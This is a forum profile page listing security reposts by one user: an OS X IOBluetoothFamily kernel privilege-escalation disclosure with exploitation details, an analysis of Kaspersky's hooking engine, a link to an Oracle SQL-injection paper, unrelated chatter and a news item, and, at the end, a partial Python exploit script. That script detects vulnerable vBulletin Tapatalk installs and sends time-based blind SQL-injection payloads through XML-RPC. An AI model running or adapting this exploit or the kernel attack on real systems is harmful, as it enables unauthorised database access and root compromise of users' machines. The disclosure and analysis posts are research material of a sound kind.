Nytro
Administrators
Posts: 18715
Days Won: 701

Everything posted by Nytro

  1. [h=3]Mac OS X local privilege escalation (IOBluetoothFamily)[/h]
(This post is a joint work with @joystick, see also his blog here)

Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods, including ASLR, NX, various heap protections, stack canaries, and sandboxed execution. As a natural consequence, instead of struggling with such a plethora of defensive methods, attackers prefer to take the "easy" way and have started to move to the kernel level, where sophisticated protection techniques are still not very common (indeed, things like KASLR and SMEP are implemented only in the latest versions of the most popular OSes). This trend is also confirmed by the rising number of kernel-level vulnerabilities reported in the last few months in Windows, Linux, and OS X.

Following this trend, we recently looked at a few OS X drivers ("KEXT"s) and found an integer signedness bug affecting the service IOBluetoothHCIController (implemented by the IOBluetoothFamily KEXT). This vulnerability can be exploited by a local attacker to gain root privileges. The issue is present on the latest versions of OS X Mavericks (tested on 10.9.4 and 10.9.5), but has been "silently" patched by Apple in OS X Yosemite.

[h=3]Vulnerability overview[/h]
In a nutshell, the bug lies in the IOBluetoothHCIUserClient::SimpleDispatchWL() function. The function eventually takes a user-supplied 32-bit signed integer value and uses it to index a global array of structures containing a function pointer. The chosen function pointer is finally called. As the reader can easily imagine, SimpleDispatchWL() fails at properly sanitizing the user-supplied index, thus bad things may happen if a malicious user is able to control the chosen function pointer. More in detail, the vulnerable part of the function is summarized in the pseudocode below.

At line 14, the user-supplied 32-bit integer is cast to a 64-bit value. Then, the "if" statement at line 16 returns an error if the cast (signed) value is greater than the number of methods available in the global _sRoutines array; obviously, due to the signed comparison, any negative value for the method_index variable will pass this test. At line 20 method_index is used to access the _sRoutines array, and the retrieved callback is finally called at line 23.

 1  typedef struct {
 2    void (*function_pointer)();
 3    uint64 num_arguments;
 4  } BluetoothMethod;
 5
 6  BluetoothMethod _sRoutines[] = { ... };
 7  uint64 _sRoutineCount = sizeof(_sRoutines)/sizeof(BluetoothMethod);
 8
 9  IOReturn
10  IOBluetoothHCIUserClient::SimpleDispatchWL(IOBluetoothHCIDispatchParams *params)
11  {
12
13    // Here "user_param" is a signed 32-bit integer parameter
14    int64 method_index = (int64) user_param;
15
16    if (method_index >= _sRoutineCount) {
17      return kIOReturnUnsupported;
18    }
19
20    BluetoothMethod method = _sRoutines[method_index];
21    ...
22    if (method.num_arguments < 8) {
23      method.function_pointer(...);
24    }
25    ...
26  }

[h=3]Exploitation details[/h]
Exploitation of this vulnerability is just a matter of supplying the proper negative integer value in order to make IOBluetoothFamily index the global _sRoutines structure out of its bounds, and to fetch an attacker-controlled structure. The supplied value must be negative to index outside the _sRoutines structure while still satisfying the check at line 16. As a foreword, consider that for our "proof-of-concept" we disabled both SMEP/SMAP and KASLR, so some additional voodoo tricks are required to get a fully weaponized exploit.

Thus, our approach was actually very simple: we computed a value for the user-supplied parameter that allowed us to index a BluetoothMethod structure such that BluetoothMethod.function_ptr is a valid user-space address (where we placed our shellcode), while BluetoothMethod.num_arguments is an integer value less than 8 (to satisfy the check performed by SimpleDispatchWL() at line 22). As shown in the C code fragment above, the user-supplied 32-bit value (user_param) is first cast to a 64-bit signed value, and then used as an index in _sRoutines. Each entry of the global _sRoutines array is 16 bytes wide (two 8-byte values). These operations are implemented by the following assembly code:

; r12+70h points to the user-supplied index value
mov ecx, [r12+70h]
mov r13d, kIOReturnUnsupported
lea rdx, _sRoutineCount
cmp ecx, [rdx]
jge fail
; Go on and fetch _sRoutine[method_index]
...
movsxd rax, ecx          ; Sign extension to 64-bit value
shl rax, 4               ; method_index *= sizeof(BluetoothMethod)
lea rdx, _sRoutines
mov esi, [rdx+rax+8]     ; esi = _sRoutines[method_index].num_arguments
cmp esi, 7               ; Check method.num_arguments < 8
ja loc_289BA
...

At a higher level, the address of the BluetoothMethod structure fetched when processing an index value "user_param" is computed by the following formula:

struct_addr = (ext(user_param & 0xffffffff) * 16) + _sRoutine

where ext() is the sign-extension operation (implemented by the movsxd instruction in the assembly code snippet above). By solving this formula for user_param and searching inside the kernel address space, we found several candidate addresses that matched our criteria (i.e., a valid user-space pointer followed by an integer value < 8). The rest of the exploit is just a matter of mmap()'ing the shellcode at the proper user-space address, connecting to the IOBluetoothHCIController service and invoking the vulnerable method.

The source code for a (very rough) proof-of-concept implementation of the aforementioned exploit is available here, while the following figure shows the exploit "in action".

(Figure: Execution of our "proof-of-concept" exploit)

[h=3]Patching[/h]
We verified the security issue both on OS X Mavericks 10.9.4 and 10.9.5 (MD5 hash values for the IOBluetoothFamily KEXT bundle on these two OS versions are 2a55b7dac51e3b546455113505b25e75 and b7411f9d80bfeab47f3eaff3c36e128f, respectively). After the release of OS X Yosemite (10.10), we noticed the vulnerability has been silently patched by Apple, with no mention of it in the security change log. A side-by-side comparison between versions 10.9.x and 10.10 of IOBluetoothFamily confirms Apple has patched the device driver by rejecting negative values for the user-supplied index. In the figure below, the user-supplied index value is compared against _sRoutineCount (orange basic block). Yosemite adds an additional check to ensure the (signed) index value is non-negative (green basic block, on the right).

(Figure: Comparison of the vulnerable OS X driver (Mavericks, on the left) and patched version (Yosemite, on the right))

[h=3]Conclusions[/h]
We contacted Apple on October 20th, 2014, asking about their intention to back-port the security fix to OS X Mavericks. Unfortunately, we got no reply, so we decided to publicly disclose the details of this vulnerability: Yosemite has been out for a while now and is available for free to Apple customers; thus, we don't think the public disclosure of this bug could endanger end users.

Source: Roberto Paleari's blog: Mac OS X local privilege escalation (IOBluetoothFamily)
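To make the signedness problem concrete, here is an added C model (not the authors' code, nor Apple's) of the two bounds checks the post contrasts: the Mavericks check, which only compares the sign-extended index against _sRoutineCount with a signed comparison, and the Yosemite check, which additionally rejects negative indices. It also evaluates the post's address formula struct_addr = ext(user_param) * 16 + _sRoutines for a few indices. The four-entry _sRoutines table, and the function names mavericks_index_accepted, yosemite_index_accepted and method_struct_addr, are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Model of the BluetoothMethod entry from the post: a callback plus its
 * argument count. The struct is 16 bytes, matching the "shl rax, 4" stride. */
typedef struct {
    void (*function_pointer)(void);
    uint64_t num_arguments;
} BluetoothMethod;

static void noop(void) {}

/* Constructed stand-in for the kernel's global _sRoutines table (4 entries). */
static BluetoothMethod sRoutines[] = {
    { noop, 1 }, { noop, 2 }, { noop, 3 }, { noop, 4 },
};
static const uint64_t sRoutineCount = sizeof(sRoutines) / sizeof(sRoutines[0]);

/* Mavericks-style check as in the pseudocode: an upper bound only, evaluated
 * with a signed comparison (cmp ecx, [rdx]; jge fail). Returns 1 when the
 * index would be accepted and used to read _sRoutines, 0 when rejected. */
int mavericks_index_accepted(int32_t user_param)
{
    int64_t method_index = (int64_t)user_param;      /* movsxd rax, ecx */
    if (method_index >= (int64_t)sRoutineCount)
        return 0;
    return 1;                                        /* negatives get here */
}

/* Yosemite-style check described in the "Patching" section: the same upper
 * bound plus a rejection of negative (signed) indices. */
int yosemite_index_accepted(int32_t user_param)
{
    int64_t method_index = (int64_t)user_param;
    if (method_index < 0 || method_index >= (int64_t)sRoutineCount)
        return 0;
    return 1;
}

/* Address the vulnerable lookup would read from, per the post's formula
 * struct_addr = (ext(user_param) * 16) + _sRoutines. Negative indices wrap
 * modulo 2^64, i.e. they land below the table. */
uint64_t method_struct_addr(int32_t user_param, uint64_t routines_base)
{
    int64_t method_index = (int64_t)user_param;       /* sign extension */
    return routines_base + (uint64_t)(method_index * 16); /* shl rax, 4 */
}

int main(void)
{
    int32_t samples[] = { 0, 3, 4, -1, INT32_MIN };
    uint64_t base = (uint64_t)(uintptr_t)sRoutines;
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        printf("index %11d: mavericks=%d yosemite=%d addr=0x%llx\n",
               (int)samples[i],
               mavericks_index_accepted(samples[i]),
               yosemite_index_accepted(samples[i]),
               (unsigned long long)method_struct_addr(samples[i], base));
    }
    return 0;
}
```

Running it shows the point of the patch: every negative index passes the Mavericks check and resolves to an address below the table, while the Yosemite check rejects it before the lookup.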
  2. Kaspersky Hooking Engine Analysis
October 27, 2014, by Andrea Sindoni

In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen will be Kaspersky (Kaspersky PURE 3.0 Total Security, trial version); we will deal with various hooking techniques used both in user and kernel mode. The reference operating system will be Windows 7 Professional 32-bit. The image below shows a summary of the techniques we will analyze in this article. In order, we will deal with:

User-space Processes
Inline hooking
IAT and EAT
Virtual Address Descriptor
Hidden registry entry
IDT
SSDT
MINI-FILTER
IRP
TDI HOOKING
CALLBACKS
Conclusion

User-space Processes

We start with a brief introduction by looking at the processes of Kaspersky in user space. The main user-space process is "avp.exe", which is instantiated twice: one instance runs under the privileges of NT AUTHORITY\SYSTEM, the other is used for the user interface (avp.exe user). The other process, ProtectedObjectsSrv.exe, acts as an encryption service. We will focus on the last one: it runs as a background Windows service called "CSObjectsSrv" (CryptoStorage control service). InfoWatch CryptoStorage is intended for centralized protection of confidential data using cryptographic methods during data storage and processing. The product is based on the integrative approach to data protection. The functional capabilities include file and folder encryption using resilient encryption algorithms, an option to create special data storage objects (the container files, logical disks and flash drives) and differentiation of access rights to the protected objects. InfoWatch CryptoStorage protects against unauthorised access to the RAM content dumped to the hard disk in case of hibernation, crash dumps or data coming from temporary files and swap files. More information about this topic can be found at InfoWatch - information security software products and solutions.

Let's now look at all the hooking methods, starting from userland.

Inline hooking

To find API hooks in user mode, we can use the apihooks plugin of Volatility. The processes involved in the inline hooking are:

svchost.exe
avp.exe[pid1] NT Authority\SYSTEM
avp.exe[pid2] avp.exe

One is for the protection service (avp.exe system), the other one, as already said, is for the user interface (avp.exe user). The service requires full system access, that's why it runs as System. Let's examine svchost.exe: this process is subject to inline hooking; in fact, at address 0x7453b5dd we can find a jump that leads to wfapigp.dll, which resides at location 0x74586218. Using Volatility we can dump the process with pid 1560 and, using IDA, we can quickly disassemble the dump and double-check for the presence of the hook at location 0x7453b5dd. Scrolling again through the report generated by Volatility, we can see that the process avp.exe uses different modules (image below). The process avp.exe makes use of different hooking techniques; let's try and investigate the following module: ushata.dll. In this case the hooking occurs inside ntdll.dll; the function hooked is ZwProtectVirtualMemory, which is located at 0x77015f18. Checking with IDA we can confirm the presence of a jump to 0x71722066, which is the location in which the hooking module ushata.dll is loaded. Here we can see how avp.exe loads ushata.dll using a standard LoadLibraryEx(). In this context, something similar to what is described in the following code can occur, basically:

hDLL = LoadLibraryExW(L"USHATA.DLL", null, 8);
lpGetNumber = (LPGETNUMBER)GetProcAddress((HMODULE)hDLL, "InitHooks");

Let's see which methods are exported by the module ushata.dll: the exported functions of the ushata.dll module are InitHooks, SetClientVerdict and SetShuttingDownHint.

In general, from the report generated by Volatility, the modules and functions that are subject to inline hooking are:

C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2]
    C:\Windows\SYSTEM32\ntdll.dll (functions ntdll.dll!NtProtectVirtualMemory and ntdll.dll!ZwProtectVirtualMemory)
C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2]
    ntdll.dll!NtProtectVirtualMemory JMP 70B12066 C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\ushata.dll
C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2]
    C:\Windows\system32\kernel32.dll
C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2]
    C:\Windows\system32\ole32.dll
C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2]
    USER32.dll!NotifyWinEvent + 6AE

The undocumented function used is NtProtectVirtualMemory, which allows setting the page protection and returns the old protection (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html).

IAT and EAT

Continuing the analysis of the hooking in user space, we can still make use of Volatility to detect the hooking performed on both the IAT and the EAT. We will find only two functions: one for the IAT hooking and another one for EAT hooking. Referring to the image at the top (EAT Hook), we conclude that the affected module is kernel32.dll, specifically the CreateThread function, as shown in the figure below.

Virtual Address Descriptor

We can open a brief parenthesis on the kernel data structure that takes care of registering the use of virtual addresses in a process; it is called the process VAD (Virtual Address Descriptor). For each process the memory manager maintains a set of VADs, which contain information on the address space of the process itself. Reconstructing the VAD tree allows for the reconstruction of the process with all of its mapped files. Here's an example: the protection field highlighted in red is extracted from the flProtect parameter passed as input to the VirtualAlloc API (VirtualAlloc function (Windows)). You can also use the windbg command !vad to display the VADs of a given process:

kd> !process 0 1 avp.exe
kd> !vad [address of VadRoot]

Hidden registry entry

A hive is a database of registry values divided into logical groups of keys and subkeys; the values in the registry, in turn, have a number of supporting files containing backups of their data. These files are located mainly in %SystemRoot%\System32\Config and are created/updated each time the user logs in. Here is a table showing the standard hives with their respective files (Registry Hives (Windows)):

Registry hive                  Supporting files
HKEY_CURRENT_CONFIG            System, System.alt, System.log, System.sav
HKEY_CURRENT_USER              Ntuser.dat, Ntuser.dat.log
HKEY_LOCAL_MACHINE\SAM         Sam, Sam.log, Sam.sav
HKEY_LOCAL_MACHINE\Security    Security, Security.log, Security.sav
HKEY_LOCAL_MACHINE\Software    Software, Software.log, Software.sav
HKEY_LOCAL_MACHINE\System      System, System.alt, System.log, System.sav
HKEY_USERS\.DEFAULT            Default, Default.log, Default.sav

Let's look for hidden registry values related to the driver klif.sys, and let's start with the help command !reg:

!reg hivelist

It displays a list of all hives in the system; then we select the hive address of SYSTEM using the following command:

!reg openkeys "Hive Address of SYSTEM"

It displays all open keys in a hive. I also used the command:

!reg cellIndex "HiveAddress of SYSTEM" "Index"

It displays the virtual address for a cell in a hive; Index specifies the cell index. Using the command:

!reg valuelist "HiveAddress of SYSTEM" KeyNodeAddress

we can show a list of the values in the specified key node; KeyNodeAddress specifies the address of the key node. Then we show the registry key value structure:

!reg kvalue Address

Address specifies the address of the value. Finally, we can reuse the cell index with the new index of the cell and the dc command (it displays double-word values, 4 bytes, and ASCII characters). We can achieve the same result using Volatility; let's briefly show how to do that using the command hivelist. And once again we come across the KLIF service.

Let's now move to the analysis of the hooking in kernel space; in particular we will deal with IDT, SSDT and IRP hooking.

IDT

System calls are used to traverse the barrier that exists between user space and kernel space; for this task the IDT is used. The IDT is the table that implements the interrupt vector table, in turn used to dispatch the interrupts. The IDT is composed, internally, of a data structure of 8-byte entries, which describes how the interrupt must be managed (x86 CPU). In the picture below you can see the relationship between the IDT and the instruction "int 2e" that is normally used to initiate a system call, even though on recent CPUs the SYSENTER instruction is used as a replacement. The goal of IDT hooking is to hook any function already registered for a given interrupt. Let's see if the software in question uses these techniques, so we can analyze it with windbg and the command !idt. Now let's run the same check with Volatility, using the command idt; we will see that the two results match. In the selected row we can see, from the column Value, that the address matches the one analyzed with windbg; also, in the column Module we can notice the presence of ntoskrnl.exe, which shows that there are no hooks in place.

SSDT

The System Service Descriptor Table (SSDT) contains pointers to kernel-mode functions provided by the kernel executable module (ntoskrnl.exe). There is a second SSDT, called the shadow SSDT table, that instead stores the native functions provided by the GUI module win32k.sys. It is important to make an observation: when a system call reaches ntdll.dll, EAX will contain the hexadecimal value corresponding to the index into the SSDT of the function to be called, and immediately after the instruction int 2E control is transferred to KiSystemService. We're going to check the contents of the two tables for the software in question; it is possible to analyze the memory with Volatility or WinDBG. From the figure on the left-hand side we can see the memory belonging to klif.sys at address 0x8C836000. On the right-hand side we have the output of the command:

kd> dps KiServiceTable l11C

which shows the presence of SSDT hooks from the klif module. We can also investigate KeServiceDescriptorTable and KeServiceDescriptorTableShadow. The module klif.sys seems to be the one that deals with SSDT and SSDT Shadow hooking. Let's look more closely at klif.sys; the first function we're going to inspect is "PsSetLoadImageNotifyRoutine", which registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). In the image below we see a series of two calls: the first one calls ZwQuerySystemInformation and then the second one invokes KeServiceDescriptorTable, which is the classical sequence used to install an SSDT hook. SSDT hooking is not performed on 64-bit systems because Kernel Patch Protection (KPP), also known as PatchGuard, protects this structure. It is anyway possible to use a mini-filter driver as a workaround.

MINI-FILTER

And indeed that's what we have, a minifilter driver. A mini-filter driver must specify an altitude value from an altitude range that represents a load order group. A minifilter driver's altitude ensures that the instance of the minifilter driver is always loaded at the appropriate location relative to other minifilter driver instances, and it determines the order in which the filter manager calls the minifilter driver to handle I/O. Altitudes are allocated and managed by Microsoft itself. The following figure shows a simplified I/O stack with the filter manager and three minifilter drivers. In our case we have:

Load order group      Altitude range    Description
FSFilter Anti-Virus   320000-329999     This group includes filter drivers that detect and disinfect viruses during file I/O.

More information at http://msdn.microsoft.com/en-us/library/windows/hardware/ff549689%28v=vs.85%29.aspx

IRP

An IRP is an object used to communicate between all the different layers of a driver stack (Driver stacks (Windows Drivers)). For each driver, there are some major functions that receive IRPs to process. These major functions are kept inside a table of pointers. This driver contains the following functions:

Driver Entry
AddDevice
Dispatch routine
Unload()

The Driver Object structure is presented as follows. By default the I/O manager points DriverInit at DriverEntry(). The array MajorFunction is essentially a table; each driver populates this table with function pointers, called dispatch routines. The main data structures used by the kernel driver major functions are the IRPs. Some of the most used are: IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_DEVICE_CONTROL. We can sniff the IRP traffic to the driver klif using IrpTracker. From the red boxes we can see the two processes, avp.exe and svchost.exe, calling the NtFsControlFile API (which sends a control code directly to the driver klif).

TDI HOOKING

The kernel module responsible for TDI hooking is kltdi.sys; we can look for it inside the structure LDR_DATA_TABLE_ENTRY, pointed to by PsLoadedModuleList. By running the modules command in Volatility we will get:

kltdi.sys 0x8cb7a000 0x9000 \SystemRoot\system32\DRIVERS\kltdi.sys

At this point we can check to see if there is something unusual for the driver "tdx". As we can see, this is a list of devices that belong to \Driver\tdx, and in each device the module kltdi.sys is present, loaded at the address 0x8cb57000. Using Windbg we can check what happens at the location where tdx.sys is loaded:

tdx.sys 0x8cb57000 0x17000 \SystemRoot\system32\DRIVERS\tdx.sys

We only see the location of the major function IRP_MJ_CREATE:

DriverName: tdx
DriverStart: 0x8cb57000
DriverSize: 0x17000
DriverStartIo: 0x0
0 IRP_MJ_CREATE 0x8cb62faa tdx.sys

Let's set a breakpoint at the address 0x8cb62faa; this is the location of the major function IRP_MJ_CREATE of the module tdx.sys. After that we can start a ping and the debugger will immediately break at the address we are expecting, thus confirming the existence of a TDI hook. We can see in the call stack the presence of the module kltdi.sys; let's focus on the function kltdi+0x4803. The IoCallDriver routine sends an IRP to the driver associated with a specified device object; it accepts two input parameters, a DEVICE_OBJECT* and an IRP*:

NTSTATUS IoCallDriver(
  _In_    PDEVICE_OBJECT DeviceObject,
  _Inout_ PIRP           Irp
);

Quoting Microsoft's documentation: An IRP passed in a call to IoCallDriver becomes inaccessible to the higher-level driver, unless the higher-level driver has called IoSetCompletionRoutine to set up an IoCompletion routine for the IRP. If it has, the IRP input to the IoCompletion routine has its I/O status block set by the lower drivers, and all lower-level drivers' I/O stack locations are filled with zeros.

CALLBACKS

Now let's take a look at the kernel callbacks, once again with Volatility:

Thread creation (PsSetCreateThreadNotifyRoutine): klif.sys, kl1.sys
Shutdown callbacks (IoRegisterShutdownNotification): kl1.sys
KeRegisterBugCheckReasonCallback: kl1.sys

There are several addresses for the callbacks, but we want to point out the presence of the kernel module kl1.sys, so let's dig deeper: kl1.sys is a boot start driver; in the image below you can see the presence (in the DriverEntry routine) of the API IoRegisterBootDriverReinitialization. The IoRegisterBootDriverReinitialization() function registers a callback routine that will be called whenever all boot drivers have been loaded. This routine is typically used in filters that attach to non-Plug-and-Play devices and thus cannot rely on the AddDevice() function being called to be notified that a new device was created (check this example for more details: Let's Start Again « DriverEntry.com.br). Now let's also look at the Driver Dispatch Routines: as you can see, all Driver Dispatch Routines point to the same address, kl1+0x32f0.

Conclusion

The article was written for educational purposes; the analysis is not detailed and many things have been analysed very quickly; also, there is still research to be done on the network part. A big thanks goes to Quequero.

Reference
http://www.reconstructer.org/papers/Hunting%20rootkits%20with%20Windbg.pdf
Malware Analysts Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

Source: https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/
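The two kinds of check this post performs by hand (reading a hooked prologue in IDA, and reviewing SSDT or dispatch-table pointers with "dps KiServiceTable") can be expressed as a small detection routine. The following C program is an added example and is not code from the article, from Volatility or from Kaspersky: it resolves an E9 rel32 jump found at a function's first byte and reports it as an inline hook when the target lies in a different module, and it counts pointer-table entries that resolve outside the module expected to own them. The module list is a constructed sample: the klif.sys base 0x8C836000 and the ntdll.dll/ushata.dll addresses 0x77015F18 and 0x71722066 come from the post, while every size, the other bases and the sample SSDT contents are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* A loaded-module range as a memory-forensics tool lists it (compare the
 * Volatility "modules" output quoted in the post). Addresses are 32-bit
 * because the post analyses Windows 7 x86. */
typedef struct {
    const char *name;
    uint32_t base;
    uint32_t size;
} ModuleRange;

/* Constructed sample module list: the klif.sys base and the two ntdll/ushata
 * addresses below are quoted in the post; sizes and other bases are assumed. */
static const ModuleRange g_modules[] = {
    { "ntoskrnl.exe", 0x82800000, 0x00400000 },
    { "klif.sys",     0x8C836000, 0x00040000 },
    { "ntdll.dll",    0x77000000, 0x00180000 },
    { "ushata.dll",   0x71700000, 0x00040000 },
};
static const size_t g_module_count = sizeof(g_modules) / sizeof(g_modules[0]);

/* Name of the module containing addr, or NULL if it lies in none of them. */
const char *module_for(uint32_t addr)
{
    for (size_t i = 0; i < g_module_count; i++)
        if (addr - g_modules[i].base < g_modules[i].size)  /* unsigned wrap */
            return g_modules[i].name;
    return NULL;
}

/* Target of a 5-byte near relative jump (E9 rel32) placed at func_addr;
 * returns 0 when the first byte is not E9. */
uint32_t jmp_rel32_target(const uint8_t *code, uint32_t func_addr)
{
    int32_t rel;
    if (code[0] != 0xE9)
        return 0;
    memcpy(&rel, code + 1, 4);             /* little-endian, as on x86 */
    return func_addr + 5 + (uint32_t)rel;  /* wraps mod 2^32 like the CPU */
}

/* Inline-hook check in the spirit of Volatility's apihooks: a prologue that
 * starts with a jump into a different module is reported as hooked.
 * Returns 1 when hooked (filling *target and *hooker if non-NULL), else 0. */
int detect_inline_hook(const uint8_t *code, uint32_t func_addr,
                       uint32_t *target, const char **hooker)
{
    if (code[0] != 0xE9)
        return 0;
    uint32_t dest = jmp_rel32_target(code, func_addr);
    const char *owner = module_for(func_addr);
    const char *dest_owner = module_for(dest);
    if (owner && dest_owner && strcmp(owner, dest_owner) == 0)
        return 0;                          /* intra-module jump: not a hook */
    if (target) *target = dest;
    if (hooker) *hooker = dest_owner;
    return 1;
}

/* Pointer-table check for SSDT/IDT/MajorFunction-style tables: count entries
 * that do not resolve into the module expected to own them (ntoskrnl.exe for
 * the SSDT, the driver itself for its own dispatch table). */
size_t count_foreign_entries(const uint32_t *table, size_t n,
                             const char *expected_owner)
{
    size_t foreign = 0;
    for (size_t i = 0; i < n; i++) {
        const char *owner = module_for(table[i]);
        if (owner == NULL || strcmp(owner, expected_owner) != 0)
            foreign++;
    }
    return foreign;
}

/* Constructed prologue reproducing the hook the post found: a jump at
 * ZwProtectVirtualMemory (0x77015F18) to 0x71722066 in ushata.dll.
 * rel32 = 0x71722066 - (0x77015F18 + 5) = 0xFA70C149, stored little-endian. */
static const uint8_t sample_hooked_prologue[5] = { 0xE9, 0x49, 0xC1, 0x70, 0xFA };

/* Constructed benign prologue: a jump from 0x77015F18 that stays inside
 * ntdll.dll (target 0x77020000, rel32 = 0x0000A0E3). */
static const uint8_t sample_benign_prologue[5] = { 0xE9, 0xE3, 0xA0, 0x00, 0x00 };

/* Constructed SSDT fragment: two kernel entries and one diverted into klif.sys. */
static const uint32_t sample_ssdt[3] = { 0x82850000, 0x8C840000, 0x82860000 };

int main(void)
{
    uint32_t dest = 0;
    const char *who = NULL;
    if (detect_inline_hook(sample_hooked_prologue, 0x77015F18, &dest, &who))
        printf("inline hook: 0x77015F18 -> 0x%08X (%s)\n", dest, who ? who : "unknown");
    printf("SSDT entries outside ntoskrnl.exe: %zu\n",
           count_foreign_entries(sample_ssdt, 3, "ntoskrnl.exe"));
    return 0;
}
```

The same count_foreign_entries() call applied to a driver's MajorFunction array, with the driver's own name as the expected owner, is the check behind the post's observation that kl1.sys points every dispatch routine at kl1+0x32f0: entries inside the driver are expected, entries outside it are what a hook looks like.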
  3. Those of you who are coming, don't forget the "Fan Nytro" T-shirts!
  4. Hacking Oracle from the Web
This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database. Most of the techniques available over the Internet are based on exploitation when the attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be directly applied when exploiting SQL injection in web applications, this is not always true. Unlike MS-SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper.
Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf
  5. If you had looked into it, you would have found out he had them before going into politics. And if you had seen the photos you would have realised they aren't "villas". The problem I see with him is this: he too hands out "bags with a bit of everything" to old ladies in the countryside so they'll vote for him. So, screw him.
  6. Vote.
  7. [h=1]A new profession in Romania: cybersecurity specialist[/h]
by Liviu Iancu - Mediafax

A new profession will appear in Romania, that of specialist in the field of cybersecurity; the job description is currently being drawn up, and it is to be introduced into the occupational code and to have salary standards set for it, Sorin Encuțescu, state adviser to the prime minister, said on Wednesday.

"Our concern at this moment is for institutions to have specialised people who can work as competently as possible in this field. That is why, along with the development of the system of institutional responsibilities, work is currently under way, including on the job descriptions for the positions to be filled, so that we are able to create in Romania, and to put into the occupational code, the position of specialist in the field of cybersecurity. This new profession must be recognised and must be introduced into the Romanian occupational code, on the basis of which we can also set salary standards," Encuțescu said at a seminar organised by the UTI group.

He showed that a new component had been introduced into the national security industry strategy: the development and support of public and state-owned economic operators active in the field of cybersecurity.

"Practically, at this moment, the strategy contains a component referring to encouraging small and medium-sized enterprises and start-ups in the field of cybersecurity. We support and encourage the creation of such companies," Encuțescu added. The adviser mentioned that the state intends to grant tax incentives to companies that invest in cybersecurity.

Teodor Cimpoeșu, director at the cybersecurity company certSIGN, part of UTI, said that in Romania cyber attacks are carried out not only by Romanians but also by foreigners. "It is a threat, on the one hand, to the individual user who is on the internet, from the simple fact that their login details and social network accounts are stolen, up to having their banking details or even the money in their account stolen. For companies it is more serious, because the IT infrastructure they use to carry out their activity can be affected," Cimpoeșu added.

Source: A new profession in Romania: cybersecurity specialist - Mediafax
  8. [h=1]vBulletin Tapatalk - Blind SQL Injection[/h]

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib, urllib2
import xmlrpclib, re, string, itertools, time
from distutils.version import LooseVersion


class Exploit(object):
    def __init__(self, target, debug=0):
        self.stopwatch_start = time.time()
        self.target = target
        self.path = target
        self.debug = debug
        if not self.target.endswith("mobiquo.php"):
            self.path = self.detect_tapatalk()
        if not self.path:
            raise Exception("Could not detect tapatalk or version not supported!")
        self.rpc_connect()
        self.attack_func = self.attack_2

    def detect_tapatalk(self):
        # request page, check for tapatalk banner
        handlers = [
            urllib2.HTTPHandler(debuglevel=self.debug),
            urllib2.HTTPSHandler(debuglevel=self.debug),
        ]
        ua = urllib2.build_opener(*handlers)
        ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
        data = ua.open(self.target).read()
        if self.debug:
            print data
        if not "tapatalkDetect()" in data:
            print "[xx] could not detect tapatalk. bye..."
            return None
        # extract tapatalk version
        print "[ i] Taptalk detected ... ",
        path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE | re.DOTALL))
        path += "mobiquo.php"
        print "'%s' ... " % path,
        data = urllib.urlopen(path).read()
        version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
        if LooseVersion(version) <= LooseVersion("5.2.1"):
            print "v.%s - OK" % version
            return path
        print "v.%s - not vulnerable" % version
        return None

    def rpc_connect(self):
        self.rpc = xmlrpclib.ServerProxy(self.path, verbose=self.debug)

    def attack_1(self, sqli, sleep=2):
        '''
        SELECT subscribethreadid FROM subscribethread AS subscribethread
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0";

        <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
        '''
        query = "-1 union %s and ( select sleep(%s) ) " % (sqli, sleep)
        query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1"  # fix query for "AND subscribeforum.userid=0"
        if self.debug:
            print """
            SELECT subscribethreadid FROM subscribethread AS subscribethread
            LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
            WHERE subscribethreadid = %s AND subscribethread.userid = 0""" % query
        return self.rpc.unsubscribe_topic("s_%s" % query)  # no escape, invalid_char="_"

    def attack_2(self, sqli, sleep=2):
        '''
        SELECT subscribeforumid FROM subscribeforum AS subscribeforum
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0";

        <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
        '''
        query = "-1 union %s and ( select sleep(%s) ) " % (sqli, sleep)
        query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1"  # fix query for "AND subscribeforum.userid=0"
        if self.debug:
